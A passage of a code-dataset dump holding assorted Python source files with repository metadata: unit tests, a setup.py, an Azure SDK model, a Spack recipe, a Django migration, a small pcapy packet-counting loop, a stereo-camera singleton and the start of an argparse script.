self.service['monitors'] = []
objs = self.get_deleted_objects(service_manager, HTTPMonitor)
assert 1 == len(objs)
assert 'mon_http' == objs[0].name
def test_policies(self, service_manager):
objs = self.get_created_objects(service_manager, Policy)
assert 1 == len(objs)
assert objs[0].name == 'test_wrapper_policy'
self.service['l7Policies'][0]['name'] = 'wrapper_policy'
objs = self.get_updated_objects(service_manager, Policy)
assert 1 == len(objs)
assert objs[0].name == 'wrapper_policy'
self.service['l7Policies'] = []
objs = self.get_deleted_objects(service_manager, Policy)
assert 1 == len(objs)
assert 'wrapper_policy' == objs[0].name
def test_internal_data_groups(self, service_manager):
objs = self.get_created_objects(service_manager, InternalDataGroup)
assert 1 == len(objs)
assert objs[0].name == 'test-dgs'
self.service['internalDataGroups'][0]['name'] = 'test-dg'
objs = self.get_updated_objects(service_manager, InternalDataGroup)
assert 1 == len(objs)
assert objs[0].name == 'test-dg'
self.service['internalDataGroups'] = []
objs = self.get_deleted_objects(service_manager, InternalDataGroup)
assert 1 == len(objs)
assert 'test-dg' == objs[0].name
def test_irules(self, service_manager):
objs = self.get_created_objects(service_manager, IRule)
assert 1 == len(objs)
assert objs[0].name == 'https_redirect'
self.service['iRules'][0]['name'] = 'https_redirector'
objs = self.get_updated_objects(service_manager, IRule)
assert 1 == len(objs)
assert objs[0].name == 'https_redirector'
self.service['iRules'] = []
objs = self.get_deleted_objects(service_manager, IRule)
assert 1 == len(objs)
assert 'https_redirector' == objs[0].name
is_comment_constant_removed: true | is_sharp_comment_removed: true
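
These tests detect create/update/delete decisions by swapping the deployer's internal methods for Mock objects and inspecting the recorded call arguments. A condensed, self-contained sketch of that pattern; the Deployer class here is a stand-in, not f5-cccl's:

from mock import Mock

class Deployer:
    def _create_resources(self, resources):
        raise NotImplementedError   # real work would happen here
    def deploy(self, resources):
        self._create_resources(resources)

deployer = Deployer()
deployer._create_resources = Mock(return_value=[])   # intercept instead of executing
deployer.deploy(['pool1', 'vs1'])
assert deployer._create_resources.called
args, kwargs = deployer._create_resources.call_args_list[0]
assert args[0] == ['pool1', 'vs1']   # the resources the deployer decided to create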

---

hexsha: 1c40b187ffe264ce102883fdd6f745650f5432a9 | size: 549 | ext: py | lang: Python
max_stars: tests/functional_tests/to_constant_tests/test_definition.py | lycantropos/lz | 632baaffc1c62cd644f6e67f0bcd7971ae6580da | ["MIT"] | count: 7 | 2019-05-26T15:30:03.000Z to 2022-03-07T16:00:31.000Z
max_issues: tests/functional_tests/to_constant_tests/test_definition.py | lycantropos/lz | 632baaffc1c62cd644f6e67f0bcd7971ae6580da | ["MIT"] | count: 29 | 2018-11-12T11:45:56.000Z to 2021-05-04T17:24:45.000Z
max_forks: tests/functional_tests/to_constant_tests/test_definition.py | lycantropos/lz | 632baaffc1c62cd644f6e67f0bcd7971ae6580da | ["MIT"] | count: null
content:
from typing import (Any,
Dict,
Tuple)
from hypothesis import given
from lz.functional import to_constant
from tests import strategies
@given(strategies.scalars,
strategies.positionals_arguments,
strategies.keywords_arguments)
def test_basic(object_: Any,
positional_arguments: Tuple,
keyword_arguments: Dict[str, Any]) -> None:
constant = to_constant(object_)
result = constant(*positional_arguments, **keyword_arguments)
assert result is object_
avg_line_length: 24.954545 | max_line_length: 65 | alphanum_fraction: 0.672131
content_no_comment:
from typing import (Any,
Dict,
Tuple)
from hypothesis import given
from lz.functional import to_constant
from tests import strategies
@given(strategies.scalars,
strategies.positionals_arguments,
strategies.keywords_arguments)
def test_basic(object_: Any,
positional_arguments: Tuple,
keyword_arguments: Dict[str, Any]) -> None:
constant = to_constant(object_)
result = constant(*positional_arguments, **keyword_arguments)
assert result is object_
is_comment_constant_removed: true | is_sharp_comment_removed: true
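
The property under test is that to_constant(x) yields a callable that ignores every argument and always returns x itself. A concrete instance of what the hypothesis-driven test asserts:

from lz.functional import to_constant

obj = object()
constant = to_constant(obj)
assert constant() is obj
assert constant(1, 2, key='value') is obj   # positional and keyword args are ignored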

---

hexsha: 1c40b19329458681621f933a54d265735457c0f6 | size: 863 | ext: py | lang: Python
max_stars: metecho/api/management/commands/tests/truncate_data.py | VaccineCloud/Metecho-Vax | 48762a2b5bb53d0d5633d1871e4f1451f5e3e91c | ["BSD-3-Clause"] | count: 1 | 2021-12-09T20:39:01.000Z to 2021-12-09T20:39:01.000Z
max_issues: metecho/api/management/commands/tests/truncate_data.py | VaccineCloud/Metecho-Vax | 48762a2b5bb53d0d5633d1871e4f1451f5e3e91c | ["BSD-3-Clause"] | count: 1,613 | 2020-03-26T16:39:57.000Z to 2022-03-07T14:54:16.000Z
max_forks: metecho/api/management/commands/tests/truncate_data.py | VaccineCloud/Metecho-Vax | 48762a2b5bb53d0d5633d1871e4f1451f5e3e91c | ["BSD-3-Clause"] | count: 2 | 2021-04-09T18:51:10.000Z to 2022-01-04T20:32:48.000Z
content:
import pytest
from django.core.management import call_command
from ....models import Epic, Project, ProjectSlug, Task
@pytest.mark.django_db
def test_truncate_data(project_factory, epic_factory, task_factory):
project_factory(repo_owner="test", repo_name="repo")
project_factory(repo_owner="test", repo_name="repo2")
project = project_factory(repo_owner="test", repo_name="repo3")
epic = epic_factory(project=project)
task_factory(epic=epic)
task_factory(epic=None, project=project)
assert ProjectSlug.objects.count() == 3
assert Project.objects.count() == 3
assert Epic.objects.count() == 1
assert Task.objects.count() == 2
call_command("truncate_data")
assert not ProjectSlug.objects.exists()
assert not Project.objects.exists()
assert not Epic.objects.exists()
assert not Task.objects.exists()
avg_line_length: 31.962963 | max_line_length: 68 | alphanum_fraction: 0.735805
content_no_comment:
import pytest
from django.core.management import call_command
from ....models import Epic, Project, ProjectSlug, Task
@pytest.mark.django_db
def test_truncate_data(project_factory, epic_factory, task_factory):
project_factory(repo_owner="test", repo_name="repo")
project_factory(repo_owner="test", repo_name="repo2")
project = project_factory(repo_owner="test", repo_name="repo3")
epic = epic_factory(project=project)
task_factory(epic=epic)
task_factory(epic=None, project=project)
assert ProjectSlug.objects.count() == 3
assert Project.objects.count() == 3
assert Epic.objects.count() == 1
assert Task.objects.count() == 2
call_command("truncate_data")
assert not ProjectSlug.objects.exists()
assert not Project.objects.exists()
assert not Epic.objects.exists()
assert not Task.objects.exists()
is_comment_constant_removed: true | is_sharp_comment_removed: true
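
call_command("truncate_data") drives the management command exactly as manage.py would from the shell. Outside a test, a programmatic invocation would presumably look like this; the settings module path is an assumption for illustration:

import os
import django
from django.core.management import call_command

os.environ.setdefault("DJANGO_SETTINGS_MODULE", "metecho.settings")  # assumed module path
django.setup()
call_command("truncate_data")   # per the test above, removes Projects, Epics, Tasks and slugs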

---

hexsha: 1c40b1a24e52abaf9b0af9bee3f8f61e57faf9fb | size: 965 | ext: py | lang: Python
max_stars: setup.py | kaniak274/pytest_django_dotenv | fb79ccd0ea2228ebdfeddca942fb2827cd5ebdc8 | ["MIT"] | count: 1 | 2021-02-16T09:21:20.000Z to 2021-02-16T09:21:20.000Z
max_issues: setup.py | kaniak274/pytest_django_dotenv | fb79ccd0ea2228ebdfeddca942fb2827cd5ebdc8 | ["MIT"] | count: null
max_forks: setup.py | kaniak274/pytest_django_dotenv | fb79ccd0ea2228ebdfeddca942fb2827cd5ebdc8 | ["MIT"] | count: null
content:
from setuptools import setup
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='pytest-django-dotenv',
version='0.1.2',
author='Kamil Kucharski',
author_email='kaniak274@gmail.com',
description='Pytest plugin used to setup environment variables with django-dotenv',
long_description=long_description,
long_description_content_type='text/markdown',
packages=['pytest_django_dotenv'],
entry_points={'pytest11': ['env = pytest_django_dotenv.plugin']},
install_requires=['pytest>=2.6.0', 'django-dotenv>=1.4.2'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6'
],
url='https://github.com/kaniak274/pytest-django-dotenv'
)
avg_line_length: 33.275862 | max_line_length: 87 | alphanum_fraction: 0.687047
content_no_comment:
from setuptools import setup
from os import path
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='pytest-django-dotenv',
version='0.1.2',
author='Kamil Kucharski',
author_email='kaniak274@gmail.com',
description='Pytest plugin used to setup environment variables with django-dotenv',
long_description=long_description,
long_description_content_type='text/markdown',
packages=['pytest_django_dotenv'],
entry_points={'pytest11': ['env = pytest_django_dotenv.plugin']},
install_requires=['pytest>=2.6.0', 'django-dotenv>=1.4.2'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6'
],
url='https://github.com/kaniak274/pytest-django-dotenv'
)
is_comment_constant_removed: true | is_sharp_comment_removed: true
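
The entry_points={'pytest11': ...} declaration is what lets pytest discover and load the plugin automatically once the package is installed. A sketch of the minimal shape such a plugin module could take; this is illustrative, not the package's actual source:

# pytest_django_dotenv/plugin.py (illustrative shape)
import dotenv   # provided by the django-dotenv dependency

def pytest_configure(config):
    # load .env variables before Django settings are imported by the test run
    dotenv.read_dotenv()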

---

hexsha: 1c40b28275563c9bcc37a95e98c3c5e5403a8490 | size: 3,226 | ext: py | lang: Python
max_stars: src/express-route-cross-connection/azext_expressroutecrossconnection/vendored_sdks/v2018_04_01/models/hub_virtual_network_connection.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | ["MIT"] | count: 207 | 2017-11-29T06:59:41.000Z to 2022-03-31T10:00:53.000Z
max_issues: src/express-route-cross-connection/azext_expressroutecrossconnection/vendored_sdks/v2018_04_01/models/hub_virtual_network_connection.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | ["MIT"] | count: 4,061 | 2017-10-27T23:19:56.000Z to 2022-03-31T23:18:30.000Z
max_forks: src/express-route-cross-connection/azext_expressroutecrossconnection/vendored_sdks/v2018_04_01/models/hub_virtual_network_connection.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | ["MIT"] | count: 802 | 2017-10-11T17:36:26.000Z to 2022-03-31T22:24:32.000Z
content:
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class HubVirtualNetworkConnection(Resource):
"""HubVirtualNetworkConnection Resource.
Variables are only populated by the server, and will be ignored when
sending a request.
:param id: Resource ID.
:type id: str
:ivar name: Resource name.
:vartype name: str
:ivar type: Resource type.
:vartype type: str
:param location: Resource location.
:type location: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param remote_virtual_network: Reference to the remote virtual network.
:type remote_virtual_network:
~azure.mgmt.network.v2018_04_01.models.SubResource
:param allow_hub_to_remote_vnet_transit: VirtualHub to RemoteVnet transit
to enabled or not.
:type allow_hub_to_remote_vnet_transit: bool
:param allow_remote_vnet_to_use_hub_vnet_gateways: Allow RemoteVnet to use
Virtual Hub's gateways.
:type allow_remote_vnet_to_use_hub_vnet_gateways: bool
:param provisioning_state: The provisioning state of the resource.
Possible values include: 'Succeeded', 'Updating', 'Deleting', 'Failed'
:type provisioning_state: str or
~azure.mgmt.network.v2018_04_01.models.ProvisioningState
:ivar etag: Gets a unique read-only string that changes whenever the
resource is updated.
:vartype etag: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
'etag': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'remote_virtual_network': {'key': 'properties.remoteVirtualNetwork', 'type': 'SubResource'},
'allow_hub_to_remote_vnet_transit': {'key': 'properties.allowHubToRemoteVnetTransit', 'type': 'bool'},
'allow_remote_vnet_to_use_hub_vnet_gateways': {'key': 'properties.allowRemoteVnetToUseHubVnetGateways', 'type': 'bool'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, **kwargs):
super(HubVirtualNetworkConnection, self).__init__(**kwargs)
self.remote_virtual_network = kwargs.get('remote_virtual_network', None)
self.allow_hub_to_remote_vnet_transit = kwargs.get('allow_hub_to_remote_vnet_transit', None)
self.allow_remote_vnet_to_use_hub_vnet_gateways = kwargs.get('allow_remote_vnet_to_use_hub_vnet_gateways', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.etag = None
avg_line_length: 43.013333 | max_line_length: 128 | alphanum_fraction: 0.657161
content_no_comment:
from .resource import Resource
class HubVirtualNetworkConnection(Resource):
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
'etag': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'remote_virtual_network': {'key': 'properties.remoteVirtualNetwork', 'type': 'SubResource'},
'allow_hub_to_remote_vnet_transit': {'key': 'properties.allowHubToRemoteVnetTransit', 'type': 'bool'},
'allow_remote_vnet_to_use_hub_vnet_gateways': {'key': 'properties.allowRemoteVnetToUseHubVnetGateways', 'type': 'bool'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, **kwargs):
super(HubVirtualNetworkConnection, self).__init__(**kwargs)
self.remote_virtual_network = kwargs.get('remote_virtual_network', None)
self.allow_hub_to_remote_vnet_transit = kwargs.get('allow_hub_to_remote_vnet_transit', None)
self.allow_remote_vnet_to_use_hub_vnet_gateways = kwargs.get('allow_remote_vnet_to_use_hub_vnet_gateways', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.etag = None
is_comment_constant_removed: true | is_sharp_comment_removed: true
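
The _attribute_map tells the msrest serializer how flat Python attributes map onto the nested REST payload (note the properties.* keys). A construction sketch, assuming the vendored package's usual SubResource sibling model; the resource ID is a placeholder:

from .sub_resource import SubResource   # assumed sibling module in the same vendored SDK

conn = HubVirtualNetworkConnection(
    remote_virtual_network=SubResource(id='/subscriptions/<sub>/.../virtualNetworks/spoke'),
    allow_hub_to_remote_vnet_transit=True,
    allow_remote_vnet_to_use_hub_vnet_gateways=False,
)
# name, type and etag are marked readonly: the server populates them; locally they stay None
assert conn.etag is None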

---

hexsha: 1c40b2b1cacdd7a0bd6c256ff4ba3c37fa555251 | size: 618 | ext: py | lang: Python
max_stars: var/spack/repos/builtin/packages/py-portalocker/package.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"] | count: 11 | 2015-10-04T02:17:46.000Z to 2018-02-07T18:23:00.000Z
max_issues: var/spack/repos/builtin/packages/py-portalocker/package.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"] | count: 22 | 2017-08-01T22:45:10.000Z to 2022-03-10T07:46:31.000Z
max_forks: var/spack/repos/builtin/packages/py-portalocker/package.py | player1537-forks/spack | 822b7632222ec5a91dc7b7cda5fc0e08715bd47c | ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"] | count: 4 | 2016-06-10T17:57:39.000Z to 2018-09-11T04:59:38.000Z
content:
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyPortalocker(PythonPackage):
"""Portalocker is a library to provide an easy API to file
locking."""
homepage = "https://github.com/WoLpH/portalocker"
url = "https://github.com/WoLpH/portalocker/archive/v1.6.0.tar.gz"
version('1.6.0', sha256='084ff315ccb9fb38a7c06155d409da5df29647da7c6d2bc2b24637f9f79001ff')
depends_on('py-setuptools@38.3.0:', type='build')
avg_line_length: 32.526316 | max_line_length: 95 | alphanum_fraction: 0.734628
content_no_comment:
from spack import *
class PyPortalocker(PythonPackage):
homepage = "https://github.com/WoLpH/portalocker"
url = "https://github.com/WoLpH/portalocker/archive/v1.6.0.tar.gz"
version('1.6.0', sha256='084ff315ccb9fb38a7c06155d409da5df29647da7c6d2bc2b24637f9f79001ff')
depends_on('py-setuptools@38.3.0:', type='build')
is_comment_constant_removed: true | is_sharp_comment_removed: true

---

hexsha: 1c40b4cc87f97cf71ca30d992fb54a0db8b1047d | size: 1,095 | ext: py | lang: Python
max_stars: wildlifecompliance/migrations/0561_wildcarespeciestype.py | mintcoding/wildlifecompliance | 28f5bb4ce3116fb62d836a39612c72a052e54ae1 | ["Apache-2.0"] | count: null
max_issues: wildlifecompliance/migrations/0561_wildcarespeciestype.py | mintcoding/wildlifecompliance | 28f5bb4ce3116fb62d836a39612c72a052e54ae1 | ["Apache-2.0"] | count: 3 | 2020-03-12T00:45:31.000Z to 2022-03-02T10:37:23.000Z
max_forks: wildlifecompliance/migrations/0561_wildcarespeciestype.py | mintcoding/wildlifecompliance | 28f5bb4ce3116fb62d836a39612c72a052e54ae1 | ["Apache-2.0"] | count: null
content:
# -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-11-25 02:33
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('wildlifecompliance', '0560_callemail_baby_kangaroo'),
]
operations = [
migrations.CreateModel(
name='WildcareSpeciesType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(choices=[('cane_toad', 'Cane Toad'), ('frog', 'Frog'), ('coot', 'Coot'), ('goose', 'Goose'), ('snake', 'Snake')], max_length=100, unique=True)),
('call_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='wildlifecompliance.CallType')),
],
options={
'verbose_name': 'CM_WilcareSpeciesType',
'verbose_name_plural': 'CM_WilcareSpeciesTypes',
'ordering': ['name'],
},
),
]
avg_line_length: 36.5 | max_line_length: 186 | alphanum_fraction: 0.6
content_no_comment:
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('wildlifecompliance', '0560_callemail_baby_kangaroo'),
]
operations = [
migrations.CreateModel(
name='WildcareSpeciesType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(choices=[('cane_toad', 'Cane Toad'), ('frog', 'Frog'), ('coot', 'Coot'), ('goose', 'Goose'), ('snake', 'Snake')], max_length=100, unique=True)),
('call_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='wildlifecompliance.CallType')),
],
options={
'verbose_name': 'CM_WilcareSpeciesType',
'verbose_name_plural': 'CM_WilcareSpeciesTypes',
'ordering': ['name'],
},
),
]
is_comment_constant_removed: true | is_sharp_comment_removed: true
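
Django applies a migration like this in dependency order (here, after 0560_callemail_baby_kangaroo). Programmatic application from a script or test, with settings already configured, would presumably be:

from django.core.management import call_command

# migrate the app forward up to and including this migration
call_command("migrate", "wildlifecompliance", "0561_wildcarespeciestype")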

---

hexsha: 1c40b56d028600725c2cf60e6f97d08757f6e869 | size: 265 | ext: py | lang: Python
max_stars: networking/packet_capture.py | ddubson/code-dojo-py | 31a1f6289672c45dc45a49a45ccc1a4326410b4b | ["MIT"] | count: 1 | 2017-03-27T00:21:01.000Z to 2017-03-27T00:21:01.000Z
max_issues: networking/packet_capture.py | ddubson/code-dojo-py | 31a1f6289672c45dc45a49a45ccc1a4326410b4b | ["MIT"] | count: null
max_forks: networking/packet_capture.py | ddubson/code-dojo-py | 31a1f6289672c45dc45a49a45ccc1a4326410b4b | ["MIT"] | count: null
content:
import pcapy
devs = pcapy.findalldevs()
print(devs)
try:
cap = pcapy.open_live("en0", 65536, 1, 0)
count = 1
while count:
(header, payload) = cap.next()
print(count)
count += 1
except KeyboardInterrupt:
print("Exiting.")
avg_line_length: 15.588235 | max_line_length: 45 | alphanum_fraction: 0.592453
content_no_comment:
import pcapy
devs = pcapy.findalldevs()
print(devs)
try:
cap = pcapy.open_live("en0", 65536, 1, 0)
count = 1
while count:
(header, payload) = cap.next()
print(count)
count += 1
except KeyboardInterrupt:
print("Exiting.")
is_comment_constant_removed: true | is_sharp_comment_removed: true
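
cap.next() returns a (header, payload) pair whose header carries capture metadata. A slightly extended sketch; "en0" is macOS-specific, so the device name may need adjusting per platform:

import pcapy

cap = pcapy.open_live("en0", 65536, 1, 0)   # device, snaplen, promiscuous, timeout
header, payload = cap.next()
sec, usec = header.getts()                  # capture timestamp (seconds, microseconds)
print(sec, usec, header.getlen(), len(payload))   # original packet length vs. captured bytes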

---

hexsha: 1c40b647a9ebb9057beb8c754620f9cd633a69da | size: 2,418 | ext: py | lang: Python
max_stars: uflow/data/dataset_size_test.py | egonrian/google-research | 8177adbe9ca0d7e5a9463b54581fe6dd27be0974 | ["Apache-2.0"] | count: 3 | 2021-01-18T04:46:49.000Z to 2021-03-05T09:21:40.000Z
max_issues: uflow/data/dataset_size_test.py | Alfaxad/google-research | 2c0043ecd507e75e2df9973a3015daf9253e1467 | ["Apache-2.0"] | count: 25 | 2020-07-25T08:53:09.000Z to 2022-03-12T00:43:02.000Z
max_forks: uflow/data/dataset_size_test.py | Alfaxad/google-research | 2c0043ecd507e75e2df9973a3015daf9253e1467 | ["Apache-2.0"] | count: 4 | 2021-02-08T10:25:45.000Z to 2021-04-17T14:46:26.000Z
content:
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that all datasets have expected length."""
from absl.testing import absltest
from uflow.data import generic_flow_dataset
from uflow.data import kitti
from uflow.data import sintel
from uflow.data.dataset_locations import dataset_locations
DATASETS_AND_SIZE = {
# Note that sintel train has 1064 images, but only 1041 ground truth flows.
# Sintel train provides 23 video snippets, and for each video snippet there
# is one fewer flow than there are images (e.g., for a video of 2 frames,
# you would only have 1 flow image).
'sintel-test-clean': 552,
'sintel-test-final': 552,
'sintel-train-clean': 1041,
'sintel-train-final': 1041,
'kitti15-train-pairs': 200,
'kitti15-test-pairs': 200,
'chairs-all': 22872,
}
class DatasetSizeTest(absltest.TestCase):
def _check_size(self, dataset, expected_size):
count = 0
for _ in dataset:
count += 1
self.assertEqual(count, expected_size)
def test_sintel(self):
for dataset in ['sintel-test-clean', 'sintel-test-final',
'sintel-train-clean', 'sintel-train-final']:
size = DATASETS_AND_SIZE[dataset]
path = dataset_locations[dataset]
ds = sintel.make_dataset(path, mode='test')
self._check_size(ds, size)
def test_kitti(self):
for dataset in ['kitti15-train-pairs', 'kitti15-test-pairs']:
size = DATASETS_AND_SIZE[dataset]
path = dataset_locations[dataset]
ds = kitti.make_dataset(path, mode='eval')
self._check_size(ds, size)
def test_chairs(self):
for dataset in ['chairs-all']:
size = DATASETS_AND_SIZE[dataset]
path = dataset_locations[dataset]
ds = generic_flow_dataset.make_dataset(path, mode='test')
self._check_size(ds, size)
if __name__ == '__main__':
absltest.main()
avg_line_length: 33.123288 | max_line_length: 79 | alphanum_fraction: 0.707196
content_no_comment:
from absl.testing import absltest
from uflow.data import generic_flow_dataset
from uflow.data import kitti
from uflow.data import sintel
from uflow.data.dataset_locations import dataset_locations
DATASETS_AND_SIZE = {
'sintel-test-clean': 552,
'sintel-test-final': 552,
'sintel-train-clean': 1041,
'sintel-train-final': 1041,
'kitti15-train-pairs': 200,
'kitti15-test-pairs': 200,
'chairs-all': 22872,
}
class DatasetSizeTest(absltest.TestCase):
def _check_size(self, dataset, expected_size):
count = 0
for _ in dataset:
count += 1
self.assertEqual(count, expected_size)
def test_sintel(self):
for dataset in ['sintel-test-clean', 'sintel-test-final',
'sintel-train-clean', 'sintel-train-final']:
size = DATASETS_AND_SIZE[dataset]
path = dataset_locations[dataset]
ds = sintel.make_dataset(path, mode='test')
self._check_size(ds, size)
def test_kitti(self):
for dataset in ['kitti15-train-pairs', 'kitti15-test-pairs']:
size = DATASETS_AND_SIZE[dataset]
path = dataset_locations[dataset]
ds = kitti.make_dataset(path, mode='eval')
self._check_size(ds, size)
def test_chairs(self):
for dataset in ['chairs-all']:
size = DATASETS_AND_SIZE[dataset]
path = dataset_locations[dataset]
ds = generic_flow_dataset.make_dataset(path, mode='test')
self._check_size(ds, size)
if __name__ == '__main__':
absltest.main()
is_comment_constant_removed: true | is_sharp_comment_removed: true

---

hexsha: 1c40b8c8b43cf840740df919cace841d79a604e2 | size: 2,398 | ext: py | lang: Python
max_stars: Stereo-Vision-System/farzad/Project/Cameras/StereoCameras.py | tonybeltramelli/Graphics-And-Vision | a1dbeada8e907b119ecce1fe421ae91e64ff3371 | ["Apache-2.0"] | count: 12 | 2017-05-26T12:04:38.000Z to 2021-07-11T04:42:19.000Z
max_issues: Stereo-Vision-System/farzad/Project/Cameras/StereoCameras.py | tonybeltramelli/Graphics-And-Vision | a1dbeada8e907b119ecce1fe421ae91e64ff3371 | ["Apache-2.0"] | count: null
max_forks: Stereo-Vision-System/farzad/Project/Cameras/StereoCameras.py | tonybeltramelli/Graphics-And-Vision | a1dbeada8e907b119ecce1fe421ae91e64ff3371 | ["Apache-2.0"] | count: 4 | 2017-05-09T08:26:44.000Z to 2018-04-23T03:16:01.000Z
content:
#<!--------------------------------------------------------------------------->
#<!-- ITU - IT University of Copenhagen -->
#<!-- SSS - Software and Systems Section -->
#<!-- File : StereoCameras.py -->
#<!-- Description: Class used for managing the stereo cameras -->
#<!-- Author : Fabricio Batista Narcizo -->
#<!-- : Rued Langgaards Vej 7 - 4D06 - DK-2300 - Copenhagen S -->
#<!-- : fabn[at]itu[dot]dk -->
#<!-- Responsible: Dan Witzner Hansen (witzner[at]itu[dot]dk) -->
#<!-- Fabricio Batista Narcizo (fabn[at]itu[dot]dk) -->
#<!-- Information: These classes are based on Lazy Initialization examples -->
#<!-- illustrated in Wikipedia -->
#<!-- Date : 05/04/2015 -->
#<!-- Change : 05/04/2015 - Creation of these classes -->
#<!-- Review : 05/04/2015 - Finalized -->
#<!--------------------------------------------------------------------------->
__version__ = '$Revision: 2015040501 $'
########################################################################
from Cameras import Cameras
from Setting.ClassProperty import ClassProperty
########################################################################
class StereoCameras(object):
"""CameraManager Class is used for managing some cameras instances."""
#----------------------------------------------------------------------#
# Class Attributes #
#----------------------------------------------------------------------#
__Instance = None
#----------------------------------------------------------------------#
# Static Class Methods #
#----------------------------------------------------------------------#
@ClassProperty
def Instance(self):
"""Create an instance for managing the stereo cameras."""
if self.__Instance is None:
self.__Instance = Cameras(0, 2)
return self.__Instance
avg_line_length: 55.767442 | max_line_length: 80 | alphanum_fraction: 0.330275
content_no_comment:
__version__ = '$Revision: 2015040501 $'
is_comment_constant_removed: true | is_sharp_comment_removed: true
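
Instance is lazily initialized: the first access builds Cameras(0, 2) and every later access returns the cached object. A self-contained sketch of the same lazy class-property pattern; this ClassProperty is a generic reimplementation, not the course's own helper:

class ClassProperty:
    """Descriptor that exposes a method as a read-only property on the class itself."""
    def __init__(self, fget):
        self.fget = fget
    def __get__(self, obj, owner):
        return self.fget(owner)

class Cameras:
    def __init__(self, left, right):
        self.indices = (left, right)

class StereoCameras:
    __Instance = None

    @ClassProperty
    def Instance(cls):
        if cls.__Instance is None:            # name-mangled to _StereoCameras__Instance
            cls.__Instance = Cameras(0, 2)    # constructed only on first access
        return cls.__Instance

assert StereoCameras.Instance is StereoCameras.Instance   # same cached object both times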

---

hexsha: 1c40b91e04029a84ae33cbabeb5831f5f3e1d38e | size: 9,216 | ext: py | lang: Python
max_stars: scripts/ased_search_inversion1_cifar100.py | anton-muravev/ased | 16ddb70ac3e46556cf49569915df0165a6fb7d16 | ["Apache-2.0"] | count: null
max_issues: scripts/ased_search_inversion1_cifar100.py | anton-muravev/ased | 16ddb70ac3e46556cf49569915df0165a6fb7d16 | ["Apache-2.0"] | count: null
max_forks: scripts/ased_search_inversion1_cifar100.py | anton-muravev/ased | 16ddb70ac3e46556cf49569915df0165a6fb7d16 | ["Apache-2.0"] | count: 1 | 2021-12-06T08:42:59.000Z to 2021-12-06T08:42:59.000Z
content:
# -*- coding: utf-8 -*-
## INVERSION1 EXPERIMENT ON CIFAR100
import utorch
import ased
import ased_util
import sys
import time
import numpy as np
from astore import Astore
from sklearn.model_selection import StratifiedShuffleSplit
import argparse
import torch
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torch.utils.data.distributed
import torchvision.transforms as transforms
import torchvision.datasets as datasets
parser = argparse.ArgumentParser(description="Run the ASED search with the given settings")
parse_group = parser.add_mutually_exclusive_group()
parser.add_argument('--cifarpath', required=True, help="path to CIFAR100 dataset")
parser.add_argument('--init', required=True, help="path to init file, including filename")
parser.add_argument('--out', required=True, help="prefix for output files")
parse_group.add_argument('--dense', type=int,
help="enable dense shortcut pattern with given value")
parse_group.add_argument('--residual', type=int,
help="enable residual shortcut pattern with given value")
parser.add_argument('--iter', type=int, default=9,
help="number of search iterations to run")
parser.add_argument('--bound', type=float, default=0.9,
help="the upper bound for probability")
